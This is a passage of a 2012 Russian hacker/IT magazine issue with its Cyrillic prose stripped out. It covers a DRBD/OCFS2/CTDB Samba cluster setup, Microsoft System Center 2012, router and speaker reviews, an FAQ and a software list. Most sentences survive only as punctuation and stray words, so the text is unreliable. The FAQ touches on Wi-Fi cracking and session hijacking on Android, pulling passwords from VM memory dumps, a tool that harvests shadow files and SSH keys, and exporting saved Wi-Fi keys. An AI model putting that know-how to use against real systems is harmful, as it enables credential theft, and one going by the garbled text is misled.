# (primary/primary)
allow-two-primaries;
after-sb-0pri discard-zero-changes;
after-sb-1pri consensus;
after-sb-2pri disconnect;
#
shared-secret "";
cram-hmac-alg sha1;
}
#
on node1 {
device /dev/drbd0;
disk /dev/sdb;
address 10.0.0.1:7788;
meta-disk internal;
}
#
on node2 {

-
,


124
0124

device /dev/drbd0;
disk /dev/sdb;
address 10.0.0.2:7788;
meta-disk internal;
}
}

,
, ,
. ,
.
disk ,
, address IP-
DRDB. .
,
:
# drbdadm create-md r0

drbd ( ):
# /etc/init.d/drbd start

,
, DRBD :
# drbdsetup /dev/drbd0 primary -o

,
, /proc/drbd:
# cat /proc/drbd

04
04 /159/
/159/ 2012
2012

. ,

.
( ),
OCFS2 Oracle ( , GFS2).
OCFS2 , , ,
:
# apt-get install ocfs2-tools

/etc/ocfs2/cluster.conf.

:

( /samba
Samba):
# mkdir /samba
# echo "/dev/drbd0 /samba ocfs2 noatime 0 0" >> /etc/fstab
# mount /dev/drbd0

. ,
.
.

SAMBA
# vi /etc/ocfs2/cluster.conf
cluster:
node_count = 2
name = ocfs2
node:
ip_port = 7777
ip_address = 192.168.0.1
number = 1
name = node1.cluster.local
cluster = ocfs2
node:
ip_port = 7777
ip_address = 192.168.0.2
number = 2
name = node2.cluster.local
cluster = ocfs2

ocfs2 :
node1.cluster.local node2.cluster.local.
, IP- /etc/hosts .
,
ocfs2
, . ,
IP-.
o2cb:
# /etc/init.d/o2cb start

DRBD-.
:

,
Samba. ,
, CTDB, Samba,
.
, Samba :
[global]
clustering = yes
idmap backend = tdb2
private dir=/samba/ctdb
fileid:mapping = fsid
vfs objects = fileid
[public]
comment = public share
path = /samba/public
public = yes
writeable = yes
only guest = yes

/etc/samba/smb.conf , /samba/ctdb CTDB. ,


,
OCFS2 .
, , :
# mkdir /samba/ctdb
# mkdir /samba/public
# chmod 777 /samba/public

# mkfs.ocfs2 -L "ocfs2" /dev/drbd0

# smbpasswd -a root

CTDB-

04
04 /159/
/159/ 2012
2012

125
0125

SYN/ACK
SYN/ACK

(zobnin@gmail.com)


.
CTDB :
# apt-get install ctdb

, ,
,
. Fedora/RedHat /etc/
sysconfig/ctdb, Debian/Ubuntu /etc/default/ctdb. :
# lock-
CTDB_RECOVERY_LOCK="/samba/ctdb/lock"
# ,
#
CTDB_PUBLIC_INTERFACE=eth0
# ,
CTDB_PUBLIC_ADDRESSES=/etc/ctdb/public_addresses
# Samba CTDB
CTDB_MANAGES_SAMBA=yes
# CTDB-
CTDB_NODES=/etc/ctdb/nodes
#
CTDB_LOGFILE=/var/log/log.ctdb

/etc/ctdb/nodes IP Samba, :
192.168.0.1/24
192.168.0.2/24

/etc/ctdb/public_addresses
IP-:

, .
IP-, .
.
, CTDB
IP- , ,
.
. CTDB
:
# /etc/init.d/ctdb start

, ctdb status
- :

OK (THIS NODE)


,


126
0126

CTDB:
# ctdb ping -n all
response from 0 time=0.000064 sec
response from 1 time=0.000087 sec

(3 clients)
(9 clients)

Samba:
# /etc/init.d/samba start

, .
Windows- ,
. UNIX . ,
IP-, /etc/ctdb/public_addresses:
# mount -t cifs //192.168.0.3/public \
/mnt/samba -o user=
# smbclient //192.168.0.4/public

, , ,
, .

192.168.0.3/24
192.168.0.4/24

Number of nodes:2
pnn:0 192.168.0.1

pnn:1 192.168.0.2
OK
Generation:1362679229
Size:2
hash:0 lmaster:0
hash:1 lmaster:1
Recovery mode:NORMAL (0)
Recovery master:0

, .
,
, , ,
. ?
, .
?
DRBD-, master/master
. , .
, ,
OCFS2.
(fencing),

,
. (, , ).
CTDB, .
, ,
.
UNHEALTHY DISCONNECTED, IP-
TCP- . ,
, .
CIFS ,
. ?

04
04 /159/
/159/ 2012
2012

INFO



,

lustre
GlusterFS.

WARNING
Samba

,
.

DRBD

- . -
-
( , UPS ), .
. ,
.

:
# drbdadm create-md r0
# drbdadm attach r0

,
CTDB:
# mount /dev/drbd0
# /etc/init.d/ctdb restart
# /etc/init.d/samba restart


, , , monit.
][ ,
. ,
CTDB /etc/ctdb/notify.sh,
,
, CTDB-.
, , :
# vi /etc/ctdb/notify.sh
event="$1"
shift
case $event in
unhealthy)

04
04 /159/
/159/ 2012
2012

OCFS2

mail foo@bar -s "`hostname` is UNHEALTHY" ...


;;
healthy)
mail foo@bar -s "`hostname` is HEALTHY" ...
;;
esac

CTDB ctdb status.


, :
OK ;
DISCONNECTED ;
DISABLED , ;
UNHEALTHY ,
, CTDB ;
BANNED - ,
CTDB;
STOPPED , ;
PARTIALLYONLINE ,
.
Recovery mode, . :
vNORMAL .
RECOVERY ,
.

ctdb disable ctdb enable.


. ,
, . z
127
0127

SYN/ACK
SYN/ACK

IT-
MICROSOFT:

2012
128

(grinder@synack.ru)

Microsoft
.

System Center,
.
, RC ,
RTM,
.
04 /159/ 2012

SCCM 2012 Central Administration Site

SYSTEM CENTER CONFIGURATION MANAGER 2012


, , ,
System Configuration. : Configuration Manager, Operations Manager, Service
Manager, Data Protection Manager (DPM), Virtual Machine Manager
(VMM), Orchestrator Endpoint Protection
( Forefront EP) AppController.
SCCM 2012 ( v.Next),
-
, , ,
. .
SCCM 2012 , 64- , Win2k8/R2
MSSQL2k8SP1 (x64) . (DP,
Distribution Point) - 86 Win. , SCCM
. SCCM 2007 SCCM 2012 (Migration Migration Jobs),
, . ,
, ,
, . ,
, ,
. ,
, ,
, ,
,
. ,
, .
SCCM2012 USMT (User State Migration Toolkit).
OSD (Operating System Deployment)
SCCM,
( )
, WIM. PXE
DP. Intel vPro/AMT
, .
, - Primary Site,

. Central Administration
Site (CAS, Central Primary Site),
.

04 /159/ 2012

SCCM 2012


(AI, Software Update Point, RSP SHV). ,
CAS (Primary) ,
Primary.
Secondary Site SQL- ( Express). Native Mixed ,
HTTP / HTTPS, ,
Distribution Point.
. Management
Point . , ,
Primary ,
, . Reporting
Point Reporting Services Point SQL
Reporting Services,
. Branch DP , SCCM 2012
BrachCache. SCCM 2012 , UCM (User Centric Management), ,

(, ).
, , .
,
,
. ,

. ,
, ,
, ,
. ,
.
(Required Available),
(, , App-V, Windows Mobile
CAB), . Available -


INTEL VPRO/AMT
,

129

SYN\ACK
SYN/ACK

SCCM 2012

Software Center,
. ,
( ,
), -. ,
, .
Monitoring, Status Message
Viewer, SCCM2007. Client Custom
Settings ,
.
,
.
Role-Based
Access Control (RBAC), , . Security Roles 13
, , - . ,
, , Security
Scope, , . SCCM
2012 MS Office, Wunderbar, , MMC. ,
,
. ,
Client Health
(ccmeval.exe),
.
SCCM 2012 SC AppController, Concero (. ),
SaaS , Windows Server, Hyper-V Virtual Machine Manager 2012,
Windows Azure. VM, ,
Windows Azure, VHD-.

SYSTEM CENTER OPERATIONS MANAGER 2012


OpsMgr
,

AVICode. , , ,
VLAN ( ).
SNMPv3, IPv4/IPv6, , HSRP .
OpsMgr , Root Management Server , Management Server.
OpsMgr 2012

130

SCCM 2012 *nix-

.
RMS Emulator. ,
,
Health Service
(Resource Pool) Management Server. ,
.
Failover Cluster Failover Cluster.
: AD Assignment Resource Pool,
Notifications Resource Pool All Management Servers Resource Pool,
.
( Root MS
) .
, - , . Windows, OpsMgr 2012 Linux *nix.
(Management Pack)
: Apache Tomcat, IBM WebSphere, Java EE, Oracle
WebLogic, Red Hat JBoss . , .NET J2EE Windows Azure.
PowerShell ( SCOM/
SC) *nix-.
, :
PS> Get-Command -Module OperationsManager

UNIX/Linux Shell Command Template


, , ,
OpsMgr.
OpsMgr 2007
. , RC
.

MICROSOFT DEPLOYMENT TOOLKIT 2012


MDT SCCM 2012
AD, DaRT (Diagnostic and Repair Toolkit,
Desktop Optimization Pack).
MDT2012 SCCM
2012 ( SCCM2007)
(, ). , MDT ,
.
Task Sequences: Deploy to VHD Client Task Sequence Deploy to VHD

04 /159/ 2012

INFO

SCCM2007 ][
08.09/09.09/01.10.

SCOM
2007 ][
08.11.

FEP
2007 ]
[ 09.11.

MDT 2010 ][
10.09.

WWW
SCCM
2012: clck.ru/eN3T.
MDT 2012:
microsoft.com/mdt.

SC Endpoint Protection 2012

Server Task Sequence ( VDI, ).


, MDT 2010
P2V , Sysinternal Disk2VHD ( TechNet
clck.ru/fQOp),
. ,
. ,
MDT 2012 Win8.
MDT_FOLDER/Scripts/UDIWizard_Config.
xml UDI Designer (User-Driven Installation,
MTD2010 Update 1) .
: New Computer,
Refresh Replace.
. , (
TechNet ).
Lite Touch, ,
WinRE. PowerShell.
WinXP Win2k3 .

MS SQL SERVER 2012 (DENALI)


, SQL Server 2012, .

04 /159/ 2012

,
. , .
, CTP- 100 000 , .
, .
Win2k8R2
Server Core: SQL- .
: Upgrade Advisor, Distributed Replay Migration Assistant
(SSMA). (Availability
Groups) HADR (High-Availability and Disaster Recovery)
SQL Server
.
, , ,
.
(SQL
Server Multi-Subnet Clustering).
Data Quality Services.

. Power View (Crescent) -

131

SYN\ACK
SYN/ACK

AppController


BISM
(Business Intelligence Semantic Model).
- BISM UDM
PowerPivot.
: IFilter, NEAR, .

, SHA2 256/512. SQL
Express LocalDB , .

, AppController
, : SCVMM, SSP (Virtual Machine Manager Self-Service Portal
Solution Accelerator), DDTK (Dynamic Datacenter Toolkit)
Azure Platform. AppController

, , , . ,
, - .
-,
( ) .

APPCONTROLLER 2012
AppController 2012 System
Center, ( ),
. Azure.

, , .
. z

SYSTEM CENTER 2012


System Center 2012 ( clck.ru/ePUN),

private cloud.

. ,
, .
.
2 CPU.
: System Center 2012 Standard Datacenter, .

132

(
), .

SQL Server, -
.
,
, .
- ,
System Center Client
ML Suite, Service Manager, Operations
Manager, Data Protection Manager Orchestrator.

04 /159/ 2012

12 2200 .
6 1260 .
,
!

.
: 210

GOOGLE CHROME 030

x 09 (152) 2011

LULZSEC
09 (152) 2011

082

LULZSEC / FOX NEWS

1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .

500 .



WINDOWS 7

PHPMYADMIN
064

ANDROID 070
152

,
JAVASCRIPT 050

:
, ,
FOX NEWS



+ + 2 DVD:
162
( 35% , )

!
,
.

12 3890 (24 )
6 2205 (12 )

.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (


, , ).

FERRUM

,

.
,
. . ,
, !


.
. , . Windows, Microsoft Windows Server 2008 R2 Standard,
Microsoft Windows 7 Ultimate x64.
Ixia,
(endpoints, , )
Ixchariot. Ixchariot ,

134

throughput, .
.
:
1) PPTP. Microsoft
Windows Server 2008 R2 Standard PPTP-,

WAN-. LAN- .
2) NAT.
, Static IP.
3) Wi-Fi. LAN-
, . , , . WPA2-PSK AES.
,
WiFi-: ASUS USB-N53, D-Link DWA-160, TP-Link TLWN821N ZyXEL NWD2205 EE.
ASUS USB-N53.

04 /159/ 2012

ASUS RT-N66U
, , , ASUS RT-N66U. ,
. ASUS ASUS RT-N56U
,
,
, ,
. , ASUS RTN56U .
ASUS RT-N66U ,
.
USB,
. ASUS RTN66U
: ,
PPTP.
,
, 100 /, ASUS RT-N66U
. , Dual Access,
.

04 /159/ 2012

135

FERRUM

D-LINK DSR-500N

D-Link DSR-500N

.
, WAN-
. D-Link DSR-500N
USB- Wi-Fi (
),
. , ,
,
, ,
.
D-Link DSR-500N
D-Link.
, Wi-Fi.
, ,
, D-Link
DSR-500N.
, . , D-Link ,
. ,
PPTP Wi-Fi
.

8000
.

NETGEAR WNDR4000
, , ,
? , NETGEAR WNDR4000. ,
. , , NETGEAR
.
.
PPTP NAT. . NETGEAR
WNDR4000 USB-, . ,
.

:
Wi-Fi:
:
:
:
:
:

136

ASUS RT-N66U

1x WAN (RJ-45) 10/100/1000 /, 4x


LAN (RJ-45) 10/100/1000 /
IEEE 802.11n
2.4 , 5
WEP, WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
NAT, DynDNS, Static Routing, DHCP, QoS
PPPoE, PPTP, L2TP, Static/Dynamic IP
EZSetup, WPS, - UPnP,
AiDisk, 2x USB

6000
.

D-Link DSR-500N

2x WAN (RJ-45) 10/100/1000 /, 4x LAN


(RJ-45) 10/100/1000 /
IEEE 802.11n
2.4
WEP, WPA/WPA-PSK, WPA2/WPA2-PSK (TKIP,
AES)
NAT, DynDNS, Static Routing, DHCP, QoS
PPPoE, PPTP, L2TP, Static/Dynamic IP
WPS, 1x USB, ,
Green

NETGEAR
WNDR4000

1x WAN (RJ-45) 10/100/1000 /, 4x LAN


(RJ-45) 10/100/1000 /
IEEE 802.11 a/b/g/n
2.4 , 5
WEP, WPA/WPA-PSK, WPA2/WPA2-PSK (TKIP,
AES)
NAT, DynDNS, IPTV, Static Routing, DHCP, QoS
PPPoE, PPTP, L2TP, Static/Dynamic IP
: WPS, , 1x USB

04 /159/ 2012

ZYXEL KEENETIC GIGA


ZyXEL , ,
Dial-Up. .
ZyXEL Keenetic Giga.
Keenetic
USB , , . -
, 3G/4G- Wi-Fi. Keenetic Giga
.
, 99.9%,
- , -, IPTV-.
- . ,
, .
, . ,
NAT , PPTP .
.

3300
.

TP-LINK TL-WR1043ND
,
. TP-Link TL-WR1043ND
,
USB-. . , :

?
, TP-Link TL-WR1043ND , ,
. ,
(,
USB-),
. ,
,
.
.

2000
.

TP-Link TLWR1043ND

1x WAN (RJ-45) 10/100/1000 /,


4x LAN (RJ-45) 10/100/1000 /
IEEE 802.11a/b/g/n
2.4
WEP, WPA/WPA-PSK, WPA2/WPA2PSK (TKIP, AES)
NAT, DynDNS, Static Routing, DHCP,
QoS
PPPoE, PPTP, L2TP, Static/Dynamic IP
: WPS, 1x USB

04 /159/ 2012

ZyXEL Keenetic
Giga

1x WAN (RJ-45) 10/100/1000 /,


4x LAN (RJ-45) 10/100/1000 /
IEEE 802.11n
2.4
WEP, WPA/WPA-PSK, WPA2/WPA2PSK (TKIP, AES)
NAT, DynDNS, Static Routing, DHCP,
QoS
PPPoE, PPTP, L2TP, Static/Dynamic IP
WPS, TVport, 2x USB

, ,
. ASUS RT-N66U,

,
. ASUS RT-N66U
.
ZyXEL
Keenetic GIGA . NETGEAR WNDR4000 ,
. TPLink ,
. z

137

FERRUM
WI-FI, 1 , /

ASUS RT-N66U
D-Link DSR-500N
NETGEAR WNDR4000
TP-Link TL-WR1043ND
ZyXEL Keenetic GIGA
FDX
Downstream
Upstream

10

20

30

40

50

60

70

80

90

100

110

120

130

140

5 . 2.4 , ASUS RT-N66U

PPTP, /

NAT, /

ASUS RT-N66U

ASUS RT-N66U

D-Link DSR-500N

D-Link DSR-500N

NETGEAR WNDR4000

NETGEAR WNDR4000

TP-Link TL-WR1043ND

TP-Link TL-WR1043ND

ZyXEL Keenetic GIGA

ZyXEL Keenetic GIGA

FDX
Downstream
Upstream

50 100 150 200 250 300

ASUS RT-N66U Netgear WNDR4000

FDX
Downstream
Upstream

500

1000

1500

D-Link DSR-500N NAT

WI-FI, 6 , /

ASUS RT-N66U
D-Link DSR-500N
NETGEAR WNDR4000
TP-Link TL-WR1043ND
ZyXEL Keenetic GIGA
FDX
Downstream
Upstream

10

20

30

40

50

60

70

80

90

138

04 /159/ 2012

FERRUM

EDIFIER
MP15 PLUS

:
: 1.22

: 100-20000
:
: 40
: 6
:
450
: 10
:
, /
,
,
: 3.5
,
SD-, FM-
: 2006033
: 0.2

04 /159/ 2012

: ,
, .
- ,
, . .
, - . -
, ,
. , Hi-End
, ?
Edifier.
Edifier MP15 Plus Edifier Audio Candy Plus .
, .
. ,
, .
, USB.
FM- SD- .
,
. ,
,
. , ,
. -

1200
.

,
.

, EdifierMP15 Plus .
, 200 .

.
EdifierMP15 Plus ,
. , , .

. ,
. , lossless- ,
MP3. Toshiba Satellite L635-12Q iPod nano 5G.


, Edifier MP15
Plus
. ? ,
, .
-,
.
, Edifier MP15 Plus
. z

139

UNITS / FAQ UNITED

FAQ United

FAQ@REAL.XAKEP.RU
Windows 8 Consumer
Preview, Microsoft

. ,
.
,
Microsoft,
Metro-?


A ViStart (lee-soft.com/vistart),

Windows XP,
Vista/
Windows 7.
. ,

,
,
.
: bit.ly/w7gsxv.
, Windows 8
Q Metro, ?

1. .
C:\Users\<User Profile>\
AppData\Roaming\Microsoft\Windows\
Start Menu\Programs\Startup , explorer.
exe shell:::{3080F90D-D7AD-11D9-BD980000947B0257}.
2. .
Win-R
taskschd.msc. , Create task.
,
,
(Triggers New), Begin the task: At
log on
(Delay task for: 5 seconds). (Action:
Start a program)
explorer.exe shell:::{3080F90DD7AD-11D9-BD98-0000947B0257}.

Jabber-.
,
. -
,
?


XMPP-,
, , Python. Twisted Words

(twistedmatrix.com/trac/wiki/TwistedWords),
Wokkel (wokkel.ik.nu), SleekXMPP (code.
google.com/p/sleekxmpp) , ,
, .

IMified (imified.com),
HTTP
API.

?
Windows.


,
. , WiFi HotSpot Creator
(wifihotspotcreator.com) .
SSID, WPA2

,
.


,
. ?

A:

Jabber. -,

JS- ?

,
, .
, , Android iOS
Firebug
( Firefox) Web Inspector (
WebKit-), JS-.

140

-
DOM- , , ,
(
, ) . ,
, ,
.
.
,
Adobe.

weinre
(phonegap.github.com/weinre), FireBug Web
Inspector,

, ,
.
,
, , , . Android, iOS, BlackBerry, webOS.

04 /159/ 2012

FAQ UNITED


SSL- (
GTalk ,
HTTPS).
-,
OTR (Off-theRecord).
. :

;
, ;

,
;

,
- .



SPDY,
GOOGLE,
?
SPDY ( )

, Google
HTTP.
, ( )
.
Google
Chrome Firefox,
HTTP-
Google (, Gmail),
Twitter.
90- HTTP
-,
.
TCP-,

,

, .

OTR (
) Adium, Pidgin, Kopete,
Miranda IM, Trillian, qutIM, Psi+ .
JavaScript HTML- , ,
( -,
)?

, JavaScript-,
,
(
) ,
. .
, JS-
, Malzilla (malzilla.sourceforge.
net).
,
() .

Adobe
Adobe Lab Adobe Shadow (labs.
adobe.com/technologies/shadow).

( Chrome)
( pairing).

, , .

04 /159/ 2012

SPDY
50%
(
TCP).
HTTP- ,
,
( ,
User-Agent),


, .
Google (chromium.org/spdy/
spdy-whitepaper), ,
SPDY.
-,
SPDY.
Apache (code.
google.com/p/mod-spdy),
Python (github.com/mnot/nbhttp/
tree/spdy). Chrome, ,
(bit.ly/xldeGj),
,
HTTP
SPDY.

Chrome ( , : chrome://net-internals) SPDY.

JavaScript-
(jsconsole.com) ,

.
.
.
(jsconsole.com/remote-debugging.
html) , .

JavaScript
RemoteJS (bit.ly/wF63OE).
:
GUU-, Python . ,
Android.
Sencha ,
HTML5.

141

UNITS / FAQ UNITED





(, aircrack-ng) Android?

xda-developers.
A com,

,
,
Android
airodump aircrack-ng (, bit.ly/
znrtiB). , -,
, -,
.

, DroidSheep
(droidsheep.de) Shark for Root (bit.ly/
wpexhA). , , ARP
Spoofing (, ).
PCAP-,
, ,
Wireshark.

,
?

VMware :
snapshot,
,
.vmem
. VirtualBox
.

1.
:
VirtualBox --dbg --startvm <VM name>

2. Debug
Command line....
3.
.pgmphystofile <filename>, ,
dump.
Volatility (code.google.com/p/volatility).
Passware
(lostpassword.com/kit-forensic.htm),
.
,

. -
,
?

,
.

, .
, ASUS WL-500gP
,
(wl500g.info). , ,
OpenWRT (
telnet)

firmware (
, reset settings
,
192.168.1.1
ftp). ,

nvram. ,
, nvram
show. , , .

:
Linux, .


Linux- ,
.
, ,
.
Intersect, Python. , ,
.
(passwd,
shadow, gshadow, master.passwd),
SSH- ( ),
,
Bash ,

,
.
.


,
Windows-?


WirelessKeyView
(nirsoft.net/utils/wireless_key.html),
. . Windows
Wireless Zero Configuration (,
)
.
, :

netsh wlan show profiles

,
:
netsh wlan export profile name="<
>"

XML-,

,
(, ).
? -,


!
netsh wlan add profile filename="<
.xml"

Weinre FireBug Web Inspector,

142

.

,
, . , ,
! ,
:). z

04 /159/ 2012

>Net
AutoPuTTY 0.24.2
Awasu 3.0
Cookienator 2.6.41
CrossLoop 2.82
Fiddler 2.3.9.3
Lanshark 0.0.2
Lunascape 6.6.0
mRemote 1.50
NetWorx 5.2.2
Omea Reader 2.2
Psi 0.14

>Multimedia
1by1 1.75
Audacity 1.3.14
AutoBrake 1.07
CamSpace 8.95
Capture2Text 1.10
Format Factory 2.90
Free Audio Editor 2012
mpTrim 2.13
music2pc 2.12
Picasa 3.9
SkypeAutoRecorder
Songr 1.9.33
TagScanner 5.1.610
Tunatic 1.0.1b
VideoInspector 2.3.0.126
VLC 2.0

>Misc
Aard Dictionary 0.9.3
AllDup 3.4.0
DisplayFusion 3.4.1
Evernote 4.5.3.6131
Everything 1.2.1.371
FilePro 1.0
HoeKey 1.13
HotKey Resolution Changer 1.5
LastPass 1.90
Process Blocker 0.7b
PyCmd 0.8
RegScanner 1.85
StExBar 1.8.3
Synergy 1.3.8
timeEdition 1.1.6
Workrave 1.9.4

>>WINDOWS
>Development
Dependency Walker 2.2
DJ Java Decompiler 3.12.12.96
Free JavaScript Editor 4.7
Frhed 1.6.0
HxD 1.7.7.0
KompoZer 0.8b3
Microsoft Visual Studio 11 Beta
NSIS 2.46
PHP 5.4.0
py2exe 0.6.9
RapidSVN 0.12
RubyMine 4.0
SWI-Prolog 6.0.1
TextPad 5.4.2
TortoiseSVN 1.7.5
Xdebug 2.1.3

>>UNIX
>Desktop
Bib2xhtml 3.0
Blender 2.62
Brl-cad 7.20.4
Ccextractor 0.60
Cdcat 1.8
Cdemu 1.5.0
Cinnamon 1.2
Libreoffice 3.5.0.3
Libvpx 1.0.0
Macrofusion 0.7.3
Mapsurfing
Mathomatic 15.8.0
Openshot 1.4.2
Pinta 1.1
Spacefm 0.7.0
Vlc 2.0.0
Windowmaker 0.95.2
Zile 2.4.6

>System
ClipboardZanager 1.0
CPU-M Benchmark 1.0
DHE Drive Info 3.2.493
Disk Bench 2.6.2.0
Disk Investigator 1.31
DriverIdentifier 3.9
DSynchronize 2.30.2
File Extension Monitor 1.4
MouseWrangler 1.0.2
NTFS Permissions Reporter 1.0.0
Process Explorer 15.13
Simple Data Backup 7.0
Startup Master
System Ninja 2.3.1.0
USB Oblivion 1.7.0.0
Windows Surface Scanner 2.20

>Security
AJAX Crawling Tool
BFT - Browser forensic tool
Browser Forensic Tool
Browzar 2.0
codesensor
CodeSensor 0.1
DPScan
FuzzOps-NG
Fuzzware 1.5
Heimdal
IronWASP
MagicTree 1.1
mimikatz 1.0
Nessus 5.0
PEBrowse Professional 10.1.4
SIPVicious 0.2.7
uniofuzz
Uniofuzz 0.1.2
untidy
untidy beta 2

Spiffy 0.5.11
The Dude 3.6
TightVNC 2.0.4
UltraSurf 11.04
Wuala

>Security
Afick 2.20
AlienVault
Bluelog 1.0.2
codesensor
DotDotPwn 3.0
DPScan
FuzzOps-NG
Fwknop 2.0
Gnupg 2.0.18
Heimdal
Nessus 5.0
Netifera 1.0
Reaver 1.4
Samhain 3.0.2
sipvicious 0.2.7
THC-HYDRA v7.2
Tor 0.2.2.35
Trupax 6
uniofuzz
untidy
Vpnd 1.1.4
WeBaCoo 0.2.2
zzuf 0.13

>Net
Ajaxplorer 4.0.3
Bitlbee 3.0.5
Chrome 17.0.963
Dxirc 1.00.0
Gfeedline 1.0
Gnubiff 2.2.14
Leechraft 0.5.0
Liferea 1.8.0
Nat-traverse 0.5
Pcapsipdump 0.2
Qtm 1.3.7
Rdp-runner 0.1.17
Sflphone 1.0.2
Spgt 0.7.1
Tomuss 3.1.7
Uhub 0.3.2
W3perl 3.141
Yate 4.0.0

>Devel
Anjuta 3.2.2
Execline 1.1.3
Highlight 3.7
Kotlin 0.1.429
Lgi 3.4.0
Libpki 0.6.7
Libpng 1.5.9
Lrc 0.7
Lua 5.2.0
Mahout 0.6
Mono 2.10.8
Netty 3.3.1
Opentbs 1.7.5
Panda3d 1.8.0
Parrot 4.0.0
Rails 3.2
Sabredav 1.5.7
Ujorm 1.22
Wro4j 1.4.4

>>MAC
Cathode 1.2.0
Docker 1.6.7
Gruml 1.1
HyperDock 1.2
iZip Archiver 1.4
KeyRemap4MacBook 7.5.0
Mouse Server 2.6.9
Notify 2.1
Prey 0.5.3
Private Eye 1.0
Que 1.3.1
RCDefaultApp 2.1
Resuminator 1.0
Syrinx 2.5.0
Tunatic 1.1
VLC 2.0
WhatRoute 1.10.7

>X-distr
CentOS 5.8

>System
Alsa 1.0.25
Bcfg2 1.2.1
Clonezilla 1.2.12-10
Fuse-exfat 0.9.6
Kccmp 0.3
Limitcpu 1.5
Mesa 8.0
Mondorescue 3.0.0
Nvidia 295.20
Pf-kernel 3.2.5
Procmeter3 3.6
Quotatool 1.4.12
Rally 0.5.5
Spacewalk 1.6
Wayland 0.85.0

>Server
Apache 2.2.22
Asterisk 10.1.3
Bind 9.8.1-p1
Cups 1.5.2
Dhcp 4.2.3-p2
Dovecot 2.1.1
Freeradius 2.1.12
Lighttpd 1.4.30
Mysql 5.5.21
Nsd 3.2.10
Openldap 2.4.29
Openvpn 2.2.2
Postfix 2.9.1
Postgresql 9.1.2
Pure-ftpd 1.0.35
Samba 3.6.3
Sendmail 8.14.5
Snort 2.9.2.1
Sqlite 3.7.10
Squid 3.1.19
Syslog-ng 3.3.4
Vsftpd 2.3.5

04(159) 2012



|ipnjr_qgordkpgpqdkr
mqj_ciggqo_ppgomaig
!30.%4



3()-%.').%lmazh
pnmpm`aldcodlg~imc_
g_aqmf_borfig



_jdip_lco
b_jguigh
gledldo
`gfldpkdl
gladpqmo









536&$3:15

mn_plzh
camhlgi

 


8889",&136

  

"/%30*%



odimkdlcma_ll_~

$UCK$UCK'O
'OOGLE

UNITS / WWW2

WWW2
VOX.IO
vox.io
, Skype', , . Vox.io
-
, . vox.
io- , , ,
. ,
, iOS.
Skype

XMARKS
xmarks.com
:
? Xmarks (Firefox, Chrome, Internet Explorer Safari),
. (12$ ),
. , :
,
LastPass.

LOADS.IN
loads.in

-, . , .
, . loads.in .

: Firefox, Chrome, Safari, Internet Explorer.
,
- .

DIAGRAMLY
Diagram.ly
- ,
Microsoft Visio. . ,
, - . Diagramly must have ,
,
. -, , ,
Diagramly 70 .

144

04 /159/ 2012

Оценить